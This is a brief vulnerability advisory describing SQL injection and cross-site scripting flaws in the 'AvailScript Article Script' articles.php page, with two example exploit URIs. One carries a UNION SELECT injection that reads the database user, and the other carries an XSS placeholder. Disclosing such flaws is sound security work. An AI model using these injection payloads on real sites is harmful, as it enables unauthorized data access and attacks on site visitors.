AvailScript Article Script Multiple Input Validation Vulnerabilities

info
discussion
exploit
solution
references

AvailScript Article Script Multiple Input Validation Vulnerabilities

Attackers can exploit these issues through a browser. To exploit the cross-site scripting vulnerabilities, an attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/path/articles.php?aIDS=-1+union+select+1,2,user()--
http://www.example.com/path/articles.php?aIDS=[XSS]